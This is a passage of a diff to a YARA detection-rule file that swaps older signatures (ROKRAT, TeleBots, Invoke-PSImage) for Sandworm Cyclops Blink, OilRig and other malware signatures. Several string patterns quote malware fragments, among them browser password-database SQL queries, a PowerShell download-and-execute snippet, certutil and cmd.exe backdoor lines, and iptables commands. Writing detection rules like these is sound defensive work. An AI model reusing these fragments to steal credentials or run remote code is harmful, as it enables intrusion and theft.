+		$b2 = "NSC_NONCE:" ascii nocase
+		$b3 = "/../" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2500KB and pe.imphash ( ) == "c6187b1b5f4433318748457719dd6f39"
+		1 of ( $s* ) or all of ( $b* )
 }
-rule SIGNATURE_BASE_Freeenki_Infostealer_Nov17 : FILE
+rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Notable_Strings : FILE
 {
 	meta:
-		description = "Detects Freenki infostealer malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "01365093-e40a-524a-8a13-217742542f1e"
-		date = "2017-11-28"
-		modified = "2023-01-06"
-		reference = "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rokrat.yar#L63-L92"
+		description = "Detects notable strings identified within the Cyclops Blink executable"
+		author = "NCSC"
+		id = "81ccf582-41f5-5fe5-8afc-e008e01289ff"
+		date = "2022-02-23"
+		modified = "2023-12-05"
+		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_cyclops_blink.yar#L6-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e823ef5506b2fdf30a6ff9bdf6eee552b767b66a6c007a30618fc212d598b540"
+		logic_hash = "fdd3a1de9d178370fcc66dbca4628d7bedfbc002bca9e463e11cb444302900ea"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5"
+		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
+		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
 
 	strings:
-		$x1 = "base64Encoded=\"TVqQAAMAAAAEAAAA" ascii
-		$x2 = "command =outFile &\" sysupdate\"" fullword ascii
-		$x3 = "outFile=sysDir&\"\\rundll32.exe\"" fullword ascii
-		$s1 = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command" fullword wide
-		$s2 = "c:\\TEMP\\CrashReports\\" ascii
-		$s3 = "objShell.run command, 0, True" fullword ascii
-		$s4 = "sysDir = shell.ExpandEnvironmentStrings(\"%windir%\")" fullword ascii
-		$s5 = "'Wscript.echo \"Base64 encoded: \" + base64Encoded" fullword ascii
-		$s6 = "set shell = WScript.CreateObject(\"WScript.Shell\")" fullword ascii
-		$a1 = "\\Google\\Chrome\\User Data\\Default\\Login Data" ascii
-		$a2 = "SELECT username_value, password_value, signon_realm FROM logins" fullword ascii
+		$proc_name1 = "[kworker/0:1]"
+		$proc_name2 = "[kworker/1:1]"
+		$dns_query = "POST /dns-query HTTP/1.1\x0d\x0aHost: dns.google\x0d\x0a"
+		$iptables1 = "iptables -I %s -p tcp --dport %d -j ACCEPT &>/dev/null"
+		$iptables2 = "iptables -D %s -p tcp --dport %d -j ACCEPT &>/dev/null"
+		$sys_recon1 = "{\"ver\":\"%x\",\"mods\";["
+		$sys_recon2 = "uptime: %lu mem_size: %lu mem_free: %lu"
+		$sys_recon3 = "disk_size: %lu disk_free: %lu"
+		$sys_recon4 = "hw: %02x:%02x:%02x:%02x:%02x:%02x"
+		$testpath = "%s/214688dsf46"
+		$confpath = "%s/rootfs_cfg"
+		$downpath = "/var/tmp/a.tmp"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of ( $x* ) or 3 of them or all of ( $a* ) )
+		( uint32( 0 ) == 0x464c457f ) and ( 8 of them )
 }
-
-rule SIGNATURE_BASE_Freeenki_Infostealer_Nov17_Export_Sig_Testing : FILE
+rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Module_Initialisation : FILE
 {
 	meta:
-		description = "Detects Freenki infostealer malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "929f9d41-2e71-5a86-b12f-489355bdf88d"
-		date = "2017-11-28"
+		description = "Detects the code bytes used to initialise the modules built into Cyclops Blink"
+		author = "NCSC"
+		id = "c81b92c4-3f70-5bbd-acfa-ed1e1d33461d"
+		date = "2022-02-23"
 		modified = "2023-12-05"
-		reference = "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rokrat.yar#L94-L106"
+		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_cyclops_blink.yar#L39-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2c6d8784aa976501a77441c4e705b7fdc9654277e8cd3f6d966967fb2e1cd724"
-		score = 50
+		logic_hash = "8bde37f642cf07e323beabaacd5c62f8422b451777fc1fc4a6bdf474db49de12"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5"
+		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
+		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
+
+	strings:
+		$ = {94 21 FF F0 93 E1 00 08 7C 3F 0B 78 38 00 00 ?? 7C 03
+      03 78 81 61 00 00 8E EB FF F8 7D 61 5B 78 4E 80 00 20}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and pe.exports ( "getUpdate" ) and pe.number_of_exports == 1
+		( uint32( 0 ) == 0x464c457f ) and ( any of them )
 }
-rule SIGNATURE_BASE_ROKRAT_Nov17_1 : FILE
+rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Modified_Install_Upgrade : FILE
 {
 	meta:
-		description = "Detects ROKRAT malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6bf3653b-1f96-5060-b6fd-82ccc83fad77"
-		date = "2017-11-28"
+		description = "Detects notable strings identified within the modified install_upgrade executable, embedded within Cyclops Blink"
+		author = "NCSC"
+		id = "4c4f7262-df74-5f6a-afc0-df1fcae4741c"
+		date = "2022-02-23"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rokrat.yar#L110-L127"
+		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_cyclops_blink.yar#L57-L88"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "12641d417408ef32292204f620efa3d1347238fa1c6f63b2b6f09a6c660e9e24"
+		logic_hash = "69b89dbaf3e2661f376ff1be7c19e96c82bf84fd572fea422c109f8afdd1e5aa"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
+		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
+		hash3 = "7d61c0dd0cd901221a9dff9df09bb90810754f10"
+		hash4 = "438cd40caca70cafe5ca436b36ef7d3a6321e858"
 
 	strings:
-		$s1 = "\\T+M\\Result\\DocPrint.pdb" ascii
-		$s2 = "d:\\HighSchool\\version 13\\2ndBD" ascii
-		$s3 = "e:\\Happy\\Work\\Source\\version" ascii
-		$x1 = "\\appdata\\local\\svchost.exe" ascii
-		$x2 = "c:\\temp\\esoftscrap.jpg" fullword ascii
+		$ = "/pending/%010lu_%06d_%03d_p1"
+		$ = "/pending/sysa_code_dir/test_%d_%d_%d_%d_%d_%d"
+		$ = "etaonrishdlcupfm"
+		$ = "/pending/WGUpgrade-dl.new"
+		$ = "/pending/bin/install_upgraded"
+		$ = {38 80 4C 00}
+		$ = {38 80 4C 05}
+		$ = {38 80 4C 04}
+		$ = {3C 00 48 4D 60 00 41 43 90 09 00 00}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and 1 of them )
+		( uint32( 0 ) == 0x464c457f ) and ( 6 of them )
 }
-rule SIGNATURE_BASE_Invoke_Psimage : FILE
+rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Core_Command_Check : FILE
 {
 	meta:
-		description = "Detects a command to execute PowerShell from String"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6abf53cd-6465-555b-a7d4-f5a917073f01"
-		date = "2017-12-16"
+		description = "Detects the code bytes used to test the command ID being sent to the core component of Cyclops Blink"
+		author = "NCSC"
+		id = "46066474-7647-52fb-b40d-30ff8e285b6e"
+		date = "2022-02-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/peewpw/Invoke-PSImage"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_invoke_psimage.yar#L2-L27"
+		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_cyclops_blink.yar#L90-L104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ce4bc73fcba3b82e4d11203aa2c3f0b2f85c6eb9e1784ad76a7b20500b4053f8"
-		score = 75
+		logic_hash = "71c9da1f0e9e64be87293c985f2a4a59a6c87ffd127ce5104ebe95a0ccb316af"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
+		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
 
 	strings:
-		$ = "IEX([System.Text.Encoding]::ASCII.GetString(" ascii wide
-		$ = "System.Drawing.Bitmap((a Net.WebClient).OpenRead(" ascii wide
-		$ = { 89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52
-            00 00 04 E4 00 00 03 A0 08 06 00 00 00 9D AF A9
-            E8 00 00 00 09 70 48 59 73 00 00 19 D6 00 00 19
-            D6 01 18 D1 CA ED 00 00 00 07 74 49 4D 45 07 E1
-            0C 0F 13 1E 36 89 C4 28 BF 00 00 00 07 74 45 58
-            74 41 75 74 68 6F 72 00 A9 AE CC 48 00 00 00 0C
-            74 45 58 74 44 65 73 63 72 69 70 74 69 6F 6E 00
-            13 09 21 23 00 00 00 0A 74 45 58 74 43 6F 70 79
-            72 69 67 68 74 00 AC 0F CC 3A 00 00 00 0E 74 45
-            58 74 43 72 65 61 74 69 6F 6E 20 74 69 6D 65 00
-            35 F7 0F }
+		$cmd_check = {81 3F 00 18 88 09 00 05 54 00 06 3E 2F 80 00 (07|0A|0B|0C|0D) }
 
 	condition:
-		filesize < 3000KB and 1 of them
+		( uint32( 0 ) == 0x464c457f ) and ( #cmd_check == 5 )
 }
-rule SIGNATURE_BASE_Telebots_Intercepterng : FILE
+rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Config_Identifiers : FILE
 {
 	meta:
-		description = "Detects TeleBots malware - IntercepterNG"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f4d48eb6-8235-534d-a32f-7f2711b96e9d"
-		date = "2016-12-14"
+		description = "Detects the initial characters used to identify Cyclops Blink configuration data"
+		author = "NCSC"
+		id = "db5b3a4a-82c2-500a-88f6-340b3392eac8"
+		date = "2022-02-23"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/4if3HG"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_telebots.yar#L10-L30"
+		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_cyclops_blink.yar#L106-L126"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cbf0d44d871ec471e891fb909612f58263ec0b0c702f87875f6e027362409318"
+		logic_hash = "6fa39442d717a69dd6f31a4bb2e5865c3f16156ce24a2b419d95ed751bb0d8ee"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5f9fef7974d37922ac91365588fbe7b544e13abbbde7c262fe30bade7026e118"
+		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
+		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
 
 	strings:
-		$s1 = "Usage: %s iface_num\\dump [mode] [w] [-gw] [-t1 ip]" fullword ascii
-		$s2 = "Target%d found: %s - [%.2X-%.2X-%.2X-%.2X-%.2X-%.2X]" fullword ascii
-		$s3 = "3: passwords + files, no arp poison" fullword ascii
-		$s4 = "IRC Joining Keyed Channel intercepted" fullword ascii
-		$s5 = "-tX - set target ip" fullword ascii
-		$s6 = "w - save session to .pcap dump" fullword ascii
-		$s7 = "example: %s 1 1 -gw 192.168.1.1 -t1 192.168.1.3 -t2 192.168.1.5" fullword ascii
-		$s8 = "ORACLE8 DES Authorization intercepted" fullword ascii
+		$ = {3C 00 3C 6B 60 00 3A 20 90 09 00 00}
+		$ = {3C 00 3C 63 60 00 3A 20 90 09 00 00}
+		$ = {3C 00 3C 73 60 00 3A 20 90 09 00 00}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of them ) or ( 4 of them )
+		( uint32( 0 ) == 0x464c457f ) and ( all of them )
 }
-rule SIGNATURE_BASE_Telebots_Killdisk_1 : FILE
+rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Handle_Mod_0Xf_Command : FILE
 {
 	meta:
-		description = "Detects TeleBots malware - KillDisk"
-		author = "Florian Roth (Nextron Systems)"
-		id = "111fc6bc-b790-51b9-81b7-a4716bb0aee9"
-		date = "2016-12-14"
+		description = "Detects the code bytes used to check module ID 0xf control flags and a format string used for file content upload"
+		author = "NCSC"
+		id = "36646b7a-389d-5fd9-88a1-e43e7224763a"
+		date = "2022-02-23"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/4if3HG"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_telebots.yar#L32-L51"
+		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_cyclops_blink.yar#L128-L150"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e70d324c408bae1bb42b16f19cd0e6b87e8228c7480d571fef5266eee5695fd2"
+		logic_hash = "6e3eebe404c8cd24e1e16eb3c881b1eda78ba6b365bf89c2557329e6f89396ac"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8246f709efa922a485e1ca32d8b0d10dc752618e8b3fce4d3dd58d10e4a6a16d"
+		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
+		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
 
 	strings:
-		$s1 = "Plug-And-Play Support Service" fullword wide
-		$s2 = " /c \"echo Y|" fullword wide
-		$s3 = "-set=06.12.2016#09:30 -est=1410" fullword ascii
-		$s4 = "%d.%d.%d#%d:%d" fullword ascii
-		$s5 = " /T /C /G " fullword wide
-		$s6 = "[-] > %ls" fullword wide
-		$s7 = "[+] > %ls" fullword wide
+		$ = {54 00 06 3E 54 00 07 FE 54 00 06 3E 2F 80 00 00}
+		$ = {54 00 06 3E 54 00 07 BC 2F 80 00 00}
+		$ = {54 00 06 3E 54 00 07 7A 2F 80 00 00}
+		$ = {54 00 06 3E 54 00 06 F6 2F 80 00 00}
+		$ = "file:%s\n" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 4 of them ) or ( 6 of them )
+		( uint32( 0 ) == 0x464c457f ) and ( all of them )
 }
-rule SIGNATURE_BASE_Telebots_Killdisk_2 : FILE
+rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Default_Config_Values : FILE
 {
 	meta:
-		description = "Detects TeleBots malware - KillDisk"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7797187f-c94b-5323-ae43-2dc001f0b481"
-		date = "2016-12-14"
+		description = "Detects the code bytes used to set default Cyclops Blink configuration values"
+		author = "NCSC"
+		id = "04067609-1173-51f2-907f-2a236aae6c7c"
+		date = "2022-02-23"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/4if3HG"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_telebots.yar#L53-L68"
+		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_cyclops_blink.yar#L152-L174"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e4ae09a226c4eecae18e685423ef30b3776be518609f89a078c647fe8ee00f19"
+		logic_hash = "180993057c110c0c0327b673c6d6e251534012de51cf6475838691e0942a1aa8"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "26173c9ec8fd1c4f9f18f89683b23267f6f9d116196ed15655e9cb453af2890e"
+		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
+		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
 
 	strings:
-		$s1 = "Plug-And-Play Support Service" fullword wide
-		$s2 = " /c \"echo Y|" fullword wide
-		$s3 = "%d.%d.%d#%d:%d" fullword ascii
+		$ = {38 00 00 19 90 09 01 A4}
+		$ = {3C 00 00 01 60 00 80 00 90 09 01 A8}
+		$ = {38 00 40 00 90 09 01 AC}
+		$ = {38 00 01 0B 90 09 01 B0}
+		$ = {38 00 27 11 90 09 01 C0}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them )
+		( uint32( 0 ) == 0x464c457f ) and ( 3 of them )
 }
-rule SIGNATURE_BASE_Telebots_Credraptor_Password_Stealer : FILE
+rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Handle_Mod_0X51_Command : FILE
 {
 	meta:
-		description = "Detects TeleBots malware - CredRaptor Password Stealer"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f594a946-13b4-5179-9029-a0730634d55f"
-		date = "2016-12-14"
-		modified = "2023-01-06"
-		reference = "https://goo.gl/4if3HG"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_telebots.yar#L70-L88"
+		description = "Detects the code bytes used to check commands sent to module ID 0x51 and notable strings relating to the Cyclops Blink update process"
+		author = "NCSC"
+		id = "a6800aed-27dc-5d01-b005-1eb4a62344a3"
+		date = "2022-02-23"
+		modified = "2023-12-05"
+		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_cyclops_blink.yar#L176-L200"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ed884cb7643a61109f87e2887bed7ddb838c73bce28812b76c35bb807629e116"
+		logic_hash = "8a68f4a5f5b7a45819e9a198881aa41b75a65181b63788c8b824b339bfd6fc67"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "50b990f6555055a265fde98324759dbc74619d6a7c49b9fd786775299bf77d26"
+		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
+		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
 
 	strings:
-		$s1 = "C:\\Documents and Settings\\Administrator\\Desktop\\GetPAI\\Out\\IE.pdb" fullword ascii
-		$s2 = "SELECT encryptedUsername, encryptedPassword, hostname,httpRealm FROM moz_logins" fullword ascii
-		$s3 = "SELECT ORIGIN_URL,USERNAME_VALUE,PASSWORD_VALUE FROM LOGINS" fullword ascii
-		$s4 = ".\\PAI\\IEforXPpasswords.txt" ascii
-		$s5 = "\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" ascii
-		$s6 = "Opera old version credentials" fullword wide
+		$cmd_check = {88 1F [2] 54 00 06 3E 2F 80 00 (01|02|03) }
+		$path1 = "/etc/wg/configd-hash.xml"
+		$path2 = "/etc/wg/config.xml"
+		$mnt_arg1 = "ext2"
+		$mnt_arg2 = "errors=continue"
+		$mnt_arg3 = {38 C0 0C 20}
+		$mnt_arg4 = {38 C0 0C 21}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them ) or ( 4 of them )
+		( uint32( 0 ) == 0x464c457f ) and ( #cmd_check == 3 ) and ( ( @cmd_check [ 3 ] - @cmd_check [ 1 ] ) < 0x200 ) and ( all of ( $path* ) ) and ( all of ( $mnt_arg* ) )
 }
-rule SIGNATURE_BASE_Telebots_VBS_Backdoor_1 : FILE
+
+rule SIGNATURE_BASE_Oilrig_Rgdoor_Gen1 : FILE
 {
 	meta:
-		description = "Detects TeleBots malware - VBS Backdoor"
+		description = "Detects RGDoor backdoor used by OilRig group"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2b711f66-8ec5-5b9a-a762-7e6668c821c9"
-		date = "2016-12-14"
+		id = "68ac1f35-4eaa-5899-b66c-296d7c5fa462"
+		date = "2018-01-27"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/4if3HG"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_telebots.yar#L90-L106"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig_rgdoor.yar#L13-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4ff4963058674cf71c123af74c0947da2edf3b5e2622261d14200f406dbe2992"
-		score = 75
+		logic_hash = "896900f788337327d444495ba0cd4c7c327bb4f9166bc2a981a348cf2c34cbdb"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "eb31a918ccc1643d069cf08b7958e2760e8551ba3b88ea9e5d496e07437273b2"
+		hash1 = "a9c92b29ee05c1522715c7a2f9c543740b60e36373cb47b5620b1f3d8ad96bfa"
 
 	strings:
-		$s1 = "cmd = \"cmd.exe /c \" + arg + \" >\" + outfile +\" 2>&1\"" fullword ascii
-		$s2 = "GetTemp = \"c:\\WINDOWS\\addins\"" fullword ascii
-		$s3 = "elseif (arg0 = \"-dump\") Then" fullword ascii
-		$s4 = "decode = \"certutil -decode \" + source + \" \" + dest  " fullword ascii
+		$c1 = { 00 63 6D 64 24 00 00 00 00 72 00 00 00 00 00 00 00 75 70 6C 6F
+              61 64 24 }
+		$c2 = { 63 61 6E 27 74 20 6F 70 65 6E 20 66 69 6C 65 3A 20 00 00 00 00
+              00 00 00 64 6F 77 6E 6C 6F 61 64 24 }
+		$s1 = "MyNativeModule.dll" fullword ascii
+		$s2 = "RGSESSIONID=" fullword ascii
+		$s3 = "download$" fullword ascii
+		$s4 = ".?AVCHelloWorld@@" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x6553 and filesize < 8KB and 1 of them ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "47cb127aad6c7c9954058e61a2a6429a" or 1 of ( $c* ) or 2 of them )
 }
-rule SIGNATURE_BASE_Telebots_VBS_Backdoor_2 : FILE
+rule SIGNATURE_BASE_Coreimpact_Sysdll_Exe
 {
 	meta:
-		description = "Detects TeleBots malware - VBS Backdoor"
+		description = "Detects a malware sysdll.exe from the Rocket Kitten APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "151849af-f1d0-529c-94f2-287312f6515e"
-		date = "2016-12-14"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/4if3HG"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_telebots.yar#L108-L123"
+		id = "bac55c00-5d14-59ca-8597-f52b4577be0c"
+		date = "2014-12-27"
+		modified = "2023-01-06"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_coreimpact_agent.yar#L6-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "299a2ca6eacc29b4a7697a8502a56cffda4f6bc6b3354d3cc133712c1755c476"
-		score = 75
+		hash = "f89a4d4ae5cca6d69a5256c96111e707"
+		logic_hash = "332b68e797e8ee3e26d797e106ae31e7240585ccb0ea599bebd8ac8f94313eab"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1b2a5922b58c8060844b43e14dfa5b0c8b119f281f54a46f0f1c34accde71ddb"
+		tags = ""
 
 	strings:
-		$s1 = "cmd = \"cmd.exe /c \" + arg + \" \" + arg2" fullword ascii
-		$s2 = "Dim WMI:  Set WMI = GetObject(\"winmgmts:\\\\.\\root\\cimv2\")" fullword ascii
-		$s3 = "cmd = \"certutil -encode -f \" + source + \" \" + dest" fullword ascii
+		$s0 = "d:\\nightly\\sandbox_avg10_vc9_SP1_2011\\source\\avg10\\avg9_all_vs90\\bin\\Rele" ascii
+		$s1 = "Mozilla/5.0" fullword ascii
+		$s3 = "index.php?c=%s&r=%lx" fullword ascii
+		$s4 = "index.php?c=%s&r=%x" fullword ascii
+		$s5 = "127.0.0.1" fullword ascii
+		$s6 = "/info.dat" ascii
+		$s7 = "needroot" fullword ascii
+		$s8 = "./plugins/" ascii
 
 	condition:
-		( uint16( 0 ) == 0x6944 and filesize < 30KB and 1 of them ) or ( 2 of them )
+		$s0 or 6 of them
 }
-rule SIGNATURE_BASE_Telebots_Win64_Spy_Keylogger_G : FILE
+rule SIGNATURE_BASE_Ps1_Toolkit_Powerup : FILE
 {
 	meta:
-		description = "Detects TeleBots malware - Win64 Spy KeyLogger G"
+		description = "Auto-generated rule - file PowerUp.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fd16a198-1b28-532b-a1ba-70680469ec51"
-		date = "2016-12-14"
+		id = "ff3eeec3-602d-5824-8a50-aed2081f49bc"
+		date = "2016-09-04"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/4if3HG"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_telebots.yar#L125-L144"
+		reference = "https://github.com/vysec/ps1-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_toolkit.yar#L10-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1b4db8f290bd4f943a90669afd5bff6b766d0723fb3ee9c69d7097e737beadc8"
-		score = 75
+		logic_hash = "64562c623de89df59d15db48990c25886c67b79ac9341cf8f21ef372057ccd85"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e3f134ae88f05463c4707a80f956a689fba7066bb5357f6d45cba312ad0db68e"
+		hash1 = "fc65ec85dbcd49001e6037de9134086dd5559ac41ac4d1adf7cab319546758ad"
 
 	strings:
-		$s1 = "C:\\WRK\\GHook\\gHook\\x64\\Debug\\gHookx64.pdb" fullword ascii
-		$s2 = "Install hooks error!" fullword wide
-		$s4 = "%ls%d.~tmp" fullword wide
-		$s5 = "[*]Window PID > %d: " fullword wide
-		$s6 = "Install hooks ok!" fullword wide
-		$s7 = "[!]Clipboard paste" fullword wide
-		$s9 = "[*] IMAGE : %ls" fullword wide
